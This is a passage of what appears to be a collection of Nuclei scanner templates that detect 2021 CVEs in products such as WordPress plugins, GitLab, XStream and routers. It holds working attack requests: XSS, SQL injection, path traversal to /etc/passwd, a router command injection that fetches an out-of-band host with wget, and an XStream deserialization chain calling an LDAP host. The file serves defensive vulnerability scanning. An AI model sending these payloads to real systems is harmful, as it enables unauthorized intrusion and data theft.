close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24838","info":{"name":"WordPress AnyComment <0.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh","{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/jannah/assets/","attachment-jannah-image-"],"condition":"or"}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24946","info":{"name":"WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"The event is finished\") || contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2021-26475","info":{"name":"EPrints 3.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</title><script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31755","info":{"name":"Tenda Router AC11 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/setmac HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/index.htmlr\nContent-Type: application/x-www-form-urlencoded\n\nmodule1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-28854","info":{"name":"VICIdial Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/agc/vicidial_mysqli_errors.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["text/plain"],"part":"header"},{"type":"status","status":[200]},{"type":"word","words":["vdc_db_query"],"part":"body"}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2","69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b","7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5","73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d","77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f","78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1","93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b","9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445","bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c","d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f","dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56","def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0","eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd","ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  <wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Pie Register","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site 